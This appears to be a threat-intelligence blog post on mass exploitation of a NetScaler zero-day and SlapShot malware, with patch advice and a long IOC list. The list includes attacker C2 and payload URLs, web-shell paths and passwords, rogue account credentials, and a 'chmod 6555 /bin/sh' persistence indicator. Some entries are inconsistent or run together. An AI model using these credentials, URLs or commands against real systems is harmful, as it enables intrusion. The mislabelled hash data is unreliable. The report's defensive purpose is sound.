MD5 : INITIAL DATE : SIZE : USED IP===================================bb724df37959c23a4ce6b5c5c374217e : 29th Sept 2026 : 9.84 K -> 64.94.85.67bd3f9986f3e09b84c5fcd18055cdc12e : 29th Sept 2026 : 551 B -> 45.141.21.13008d0c6e815ac5fb188d4a775bb7f78c4 : 29th Sept 2026 : 249 B -> 62.133.62.80521e589016a7769cfb904e4ed9673ad3 : 1st Oct 2026 : 975 B -> 130.94.20.222
The next anchor point was a post appeared in Reddit few days back which focuses on an IP Address of mass scanning.
213.209.159.55

Again, digging deep, I had found 33 Shell Scripts which is attributed to SlapShot Malware used in the Netscalar 0-Day Exploits, seen from 2nd October to 5th October, marking it a highly malicious artifact.
MD5 : FILE NAME: SIZE : FIRST SEEN==================================b048b13c80e231549c537887da0e5aa5 : anob4.exe : 27.81 KB -> 3rd Oct 20263f2214b27ca355e034add0d9f6692b32 : f1n1z.exe : 24.57 KB -> 2nd Oct 2026e33b306b06c08f9d3d7223215f25b2cf : fajf2ar.exe : 25.75 KB -> 2nd Oct 2026fc6370a116a027e97d6df2621fa371f2 : mf7ic.exe : 25.75 KB -> 3rd Oct 202627ac25984b50f6df6afc6997334b9505 : 274124a83e2174cc : 34.11 KB-> 3rd Oct 2026a7fe433d8982d52cabb09c8b5c9386a9 : o4cypdj.exe : 24.57 KB -> 2nd Oct 20261c0f12288170e28d1beb30062c41ee6d : 125b42e2f03297d3: 34.11 KB -> 3rd Oct 2026 b5345968ad216e196f4ab8c1d2f458ce : ae7427 : 25.75 KB -> 3rd Oct 2026 84036e61c5d7ad0e4b76b582110901f3 : ayx6lq2ub.exe : 25.75 KB -> 3rd Oct 20260915e74a43b18bb7bca2cca226f2e118 : bfzb4en7d.exe : 24.57 KB -> 2nd Oct 2026d81e80b7ed52d48575373e7aa7a7ac25 : 7vywivn.exe : 27.81 KB -> 3rd Oct 2026ff2a8ebbcf069033cce505353e5d0118 : a718e4 : 28.97 KB -> 3rd Oct 20263f1e522d94f311936337892368acc6e8 : ay5vxehi.exe : 24.57 KB -> 2nd Oct 2026ba4fb54383a9ed7c84624886ce0d352c : lnrbt2fw4.exe : 25.75 KB -> 3rd Oct 202659a926eeed450532a2f7c49412434409 : ol7ki10kv.exe : 25.75 KB -> 2nd Oct 2026047cf08ab81daba675816d85013a3438 : l3obdyup.exe : 27.81 KB -> 3rd Oct 20268414c74e881b10a760c5c3eb797ec3c8 : aaikf.exe : 24.57 KB -> 2nd Oct 2026df2f93ccc44711e299748af2bca30c8c : 9oq8oofk.exe : 25.75 KB -> 2nd Oct 20269d9df92216b8c2b6f13d324883febfe8 : 5e028d5f3daed211 : 34.11 KB -> 4th Oct 20265e8e6e69871896b6894a37865e7ee52e : ax2dpr1uw.exe : 27.80 KB -> 3rd Oct 20261c2b6c8d6310af7b2cf8a681b29f7ea4 : ae7427 : 34.08 KB -> 4th Oct 2026976fdea475236b15a0622e6751c47089 : 04p3sazy.exe : 24.57 KB -> 2nd Oct 2026979296a73a71092bb83ca07439d2e3aa : x8rsx.exe : 25.75 KB -> 2nd Oct 202612f273e40ec02a8509c340a4520a8703 : kq18zy3.exe : 24.57 KB -> 2nd Oct 2026ab385592e22a38d32c3c732c08dcc5d3 : h8sfa3.exe : 24.57 KB -> 2nd Oct 2026
8 Files are of same size which is 25.75KB
6 Files are of same size which is 24.57KB
Following is a list of IPs associated with Netscalar 0-Day Exploit at various timelines (not included all the IPs):-
64.94.85.67: Associated with Pitboss Shell 62.133.62.80: Payload Delivery31.56.197.72: Payload Delivery23.27.143.20: Python reverse-shell retrieval; drops and runs /var/1.py 45.141.21.130: Call-back address for the customsnmpd reverse shell (443)
While checking the OSINT on these IPs, we can geo-locate to the following locations with different hosting providers.

This indicates the fact that, delivering a payload from different sources does not pinpoint to a single source as it is not a single attack or campaign however, many of the attackers uses their own servers/architectures to pull up the payloads from various sources.
As this was a mass-exploit ITW, we can understand the choice of attackers.
ATTACKERS ITW (IN THE WILD)
While analyzing the Exploit Trend in Greynoise, a pattern got emerged.

September 29 has been recorded one of the highest scanning activity being performed for CVE-2026–88771.
NOTE: This is not the highest activity recorded, however the tag created on September 27 on the platform. So the prior scanning activity is not being listed here.
While scanning for CVE-2026–88771 Exploit on various other scanner services, it is found that there are few IPs spotted to be exploiting the same at faster rate. Some of them are:-
103.62.49.15437.19.221.17166.42.100.63154.217.251.226176.65.148.5481.94.239.8100.24.104.16754.152.53.24252.0.15.14015.204.172.794.183.174.99151.240.53.13382.167.14.746.151.182.18
NOTE: Complete List of IPs are provided in the IOC Section
HOW ATTACKERS TARGET POTENTIAL VICTIMS?
Just like Researchers and Threat Analysts, attackers also make use of scanner services like Shodan, Censys or Zoom Eyes to simply assess the unpatched/vulnerable services running.

Hence, collecting malware samples from VT or Sandboxes would help them to pull up the attack chain, which can even lead to Ransomware Attacks at a higher spike.
PATCH ASAP
The following versions are affected by both exploits (ATTOW):-
NetScaler ADC 14.114.1–12.x → 14.1–73.36NetScaler Gateway 14.114.1–12.x → 14.1–73.36NetScaler ADC 13.113.1–4.x → 13.1–64.22NetScaler Gateway 13.113.1–4.x → 13.1–64.22NetScaler ADC 14.1-FIPSAll 14.1-FIPS builds prior to 14.1–73.37 FIPSNetScaler ADC 13.1-FIPSAll 13.1-FIPS builds prior to 13.1–37.279NetScaler ADC 13.1-NDcPPAll 13.1-NDcPP builds prior to 13.1–37.279
In Short: Upgrade your Citrix NetScaler ADC and NetScaler Gateway appliances immediately to fixed builds 14.1–73.37, 13.1–64.23, or later FIPS/NDcPP equivalents to patch the actively exploited zero-day vulnerabilities, i.e.
- Build 14.1–73.37, 13.1–64.23, and later
- Fixed FIPS and NDcPP specific builds (14.1–73.37 FIPS, 13.1.37.279 or later)
CONCLUSION
This article can be treated as a Defenders Playbook to get the working style of various attackers found to be exploiting the same CVE. This sheds light on different methods adopted by attackers at different levels. As the attack is ongoing, there are many more artifacts which are not covered yet.
IOCs
IP ADDRESSES EXPLOITING NETSCALAR
=================================
213.209.159.55
103.62.49.154
37.19.221.171
66.42.100.63
154.217.251.226
176.65.148.54
81.94.239.8
100.24.104.167
54.152.53.242
52.0.15.140
15.204.172.7
94.183.174.99
151.240.53.133
82.167.14.7
46.151.182.18
173.231.39.244
165.227.201.112
132.243.166.140
185.156.46.162
51.158.203.95
142.93.205.229
159.65.104.231
182.101.54.57
38.134.148.238
91.92.47.105
159.26.103.184
167.148.88.236
16.59.141.234
170.205.31.28
31.56.197.137
64.225.103.14
159.203.33.46
104.234.140.143
78.128.114.22
130.12.182.7
146.70.184.249
156.146.51.66
149.102.228.88
45.61.144.161
5.83.144.60
146.70.195.85
130.94.20.222
198.13.159.233
193.29.56.109
23.97.62.138
64.94.85.67
172.247.44.85
130.94.106.141
216.203.21.233
104.234.140.120
104.234.140.131
151.243.141.81
104.234.140.136
104.234.140.125
87.224.84.82
104.234.140.119
104.234.140.127
104.234.140.122
104.234.140.116
64.177.93.71
189.24.123.161
165.22.104.177
85.117.117.248
149.28.58.71
23.234.111.22
46.150.68.55
137.220.53.135
197.52.9.138
95.63.246.50
45.249.89.172
120.28.233.211
180.242.113.168
88.180.103.22
194.28.195.90
178.66.43.241
185.209.15.246
31.13.192.160
104.203.50.26
45.143.167.96
94.190.77.195
185.170.55.89
73.43.85.7
58.187.56.89
72.73.231.73
68.46.140.222
178.218.40.232
113.137.102.68
191.37.30.194
93.177.60.233
95.229.84.239
49.36.107.103
153.75.82.220
47.76.92.109
8.210.119.74
23.234.74.48
47.243.125.255
47.242.254.3
103.132.230.45
8.217.173.25
47.76.63.52
8.210.67.91
8.218.41.110
47.243.139.40
47.239.205.29
8.218.219.56
47.76.102.1
44.226.128.41
8.218.169.8
44.252.255.141
4.246.63.96
85.203.46.191
23.132.164.35
125.122.56.47
47.76.132.65
92.118.204.229
54.70.59.128
103.102.247.73
107.172.221.57
144.126.221.237
172.98.178.104
185.243.41.247
188.221.198.9
196.19.179.229
45.39.15.23
78.111.102.223
88.218.105.254
91.199.84.112
45.61.136.143
205.169.39.13
216.245.184.164
66.227.183.84
95.133.231.123
71.196.248.170
62.82.13.78
205.169.39.147
205.169.39.44
77.83.199.39
139.180.152.138
205.169.39.14
205.169.39.139
34.122.147.229
72.50.211.109
66.167.145.88
177.227.194.214
187.156.184.230
187.156.191.208
187.156.201.239
104.248.244.66
78.47.24.217
138.68.21.29
80.240.22.229
157.230.43.185
68.183.141.155
162.243.100.252
151.101.193.135
155.138.236.14
207.148.6.33
78.135.96.136
149.28.29.221
89.36.231.206
79.133.42.141
85.11.187.35
78.128.113.10
62.133.62.80
31.56.197.72
149.104.78.141
SLAPSHOT SAMPLES
================
b048b13c80e231549c537887da0e5aa5 : anob4.exe : 27.81 KB
3f2214b27ca355e034add0d9f6692b32 : f1n1z.exe : 24.57 KB
e33b306b06c08f9d3d7223215f25b2cf : fajf2ar.exe : 25.75 KB
fc6370a116a027e97d6df2621fa371f2 : mf7ic.exe : 25.75 KB
27ac25984b50f6df6afc6997334b9505 : 274124a83e2174cc : 34.11 KB
a7fe433d8982d52cabb09c8b5c9386a9 : o4cypdj.exe : 24.57 KB
1c0f12288170e28d1beb30062c41ee6d : 125b42e2f03297d3: 34.11 KB
b5345968ad216e196f4ab8c1d2f458ce : ae7427 : 25.75 KB
84036e61c5d7ad0e4b76b582110901f3 : ayx6lq2ub.exe : 25.75 KB
0915e74a43b18bb7bca2cca226f2e118 : bfzb4en7d.exe : 24.57 KB
d81e80b7ed52d48575373e7aa7a7ac25 : 7vywivn.exe : 27.81 KB
ff2a8ebbcf069033cce505353e5d0118 : a718e4 : 28.97 KB
3f1e522d94f311936337892368acc6e8 : ay5vxehi.exe : 24.57 KB
ba4fb54383a9ed7c84624886ce0d352c : lnrbt2fw4.exe : 25.75 KB
59a926eeed450532a2f7c49412434409 : ol7ki10kv.exe : 25.75 KB
047cf08ab81daba675816d85013a3438 : l3obdyup.exe : 27.81 KB
8414c74e881b10a760c5c3eb797ec3c8 : aaikf.exe : 24.57 KB
df2f93ccc44711e299748af2bca30c8c : 9oq8oofk.exe : 25.75 KB
9d9df92216b8c2b6f13d324883febfe8 : 5e028d5f3daed211 : 34.11 KB
5e8e6e69871896b6894a37865e7ee52e : ax2dpr1uw.exe : 27.80 KB
1c2b6c8d6310af7b2cf8a681b29f7ea4 : ae7427 : 34.08 KB
976fdea475236b15a0622e6751c47089 : 04p3sazy.exe : 24.57 KB
979296a73a71092bb83ca07439d2e3aa : x8rsx.exe : 25.75 KB
URL
http://213.209.159.55:443/t/a779ab
http://213.209.159.55:443/t/ae7427
http://213.209.159.55:443/t/a718e4
http://213.209.159.55:443/t/861cd3
http://213.209.159.55:443/t/1f0a10
http://213.209.159.55:443/t/818f74
http://213.209.159.55:443/t/906b4f
http://213.209.159.55:443/t/db6c6c
http://213.209.159.55:443/t/324d58
http://213.209.159.55:443/t/29a04f
http://213.209.159.55:443/t/bad2ad
http://213.209.159.55:443/t/6f3c3e
http://213.209.159.55:443/t/274124
http://213.209.159.55:443/t/9c3166
http://213.209.159.55:443/t/3b6d2f.sh
http://213.209.159.55:443/t/62cd78.sh
http://213.209.159.55:443/t/471d83.sh
http://213.209.159.55:80/t/274124a83e2174cc
http://213.209.159.55:80/t/125b42e2f03297d3
http://213.209.159.55:443/t/5e028d5f3daed211
http://130.94.20.222:8888/c/b3a54bea3bfaa
https://entretiensol.com:443/api/v1/install/dl_d3giforcdfgc5hqurluy.ctzlc5tkt3w6p5flcmnq?download_tl
https://entretiensol.com:443/api/v1/install/dl_3wrbowpypfk26nypk6fj.erlcdi3xomfglunnik66?download_tls=insecure
https://entretiensol.com/v1/artifacts/$OS/$ARCH/latest
IP
213.209.159.55: Main C2 / Exfil host for SLAPSHOT samples
64.94.85.67: Exfil host used in the sec_monitor Perl script, Pitboss Shell
62.133.62.80: Payload Delivery
31.56.197.72: Payload Delivery
23.27.143.20: Python reverse-shell retrieval; drops and runs /var/1.py
45.141.21.130: Call-back address for the customsnmpd reverse shell (443)
Domain: entretiensol.com
URL Paths (SLAPSHOT)
====================
/t/ae7427
/t/a718e4
/t/861cd3
/t/1f0a10
/t/818f74
/t/274124a83e2174cc
Full C2 URLs
============
http://213.209.159.55:443/t/
http://213.209.159.55:80/t/274124a83e2174cc
Both port 443 and 80 observed
FILE AND PATH
=============
/nsconfig/.slap/: SLAPSHOT install directory
/var/tmp/.ux/: Secondary SLAPSHOT directory
/var/tmp/.ux/slapshot.py: Python session manager
/nsconfig/.slap/agent.pl: Perl TCP multiplexer
/nsconfig/.slap/bridge.pl: Perl bridge script
/tmp/.uxdlock: SLAPSHOT lock file
/tmp/.uxdport: SLAPSHOT port file
/var/netscaler/logon/LogonPoint/custom/.slap.receiver: Web shell receiver
/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver: Web shell receiver
/var/netscaler/logon/LogonPoint/custom/receiver.deb: Disguised web shell
/var/netscaler/logon/LogonPoint/.local_journal: Password-protected PHP web shell
/var/tmp/.ns_data: Platypus data directory
/var/tmp/.ns_09343.pl: Platypus agent binary (example name)
/var/core/.ns-cache/: Alternative Platypus working directory
/etc/httpd.conf.slap.bak: Backup of modified httpd.conf
https://entretiensol.com/v1/artifacts/$OS/$ARCH/latest: Platypus Agent Download Path
CREDENTIALS & TOKENS
====================
SLAPSHOT Auth Token: 072874c28950cf7befd319d17e9709e7
Rogue Username: sec_monitor
Rogue Password: ay#39&RGYvv4Xuzy
Web Shell Password: QI@UEG5PC7oRt31E
Web Shell SHA-256: e4d909c290d0fb1ca068ffaddf22cbd0
Platypus Token: plt_2uhfcg6a7npuwiuaiakb.w6rgc3kclkuwh7nhgr2h
BEHAVORIAL/CONFIG INDICATORS
============================
SUID on shell: chmod 6555 /bin/sh (or 06555)
httpd.conf modifications: Added SetHandler application/x-httpd-php for non-standard extensions (.deb, .sig, .ico, .local_journal)
Alias / AliasMatch: Fake CSS paths pointing to web shells (e.g. LogonUISimple.html.style.min.css)
Rogue superuser: sec_monitor bound with superuser privileges in ns.conf
Exfil filename: update_result_3567cs.tgz
Leave a Reply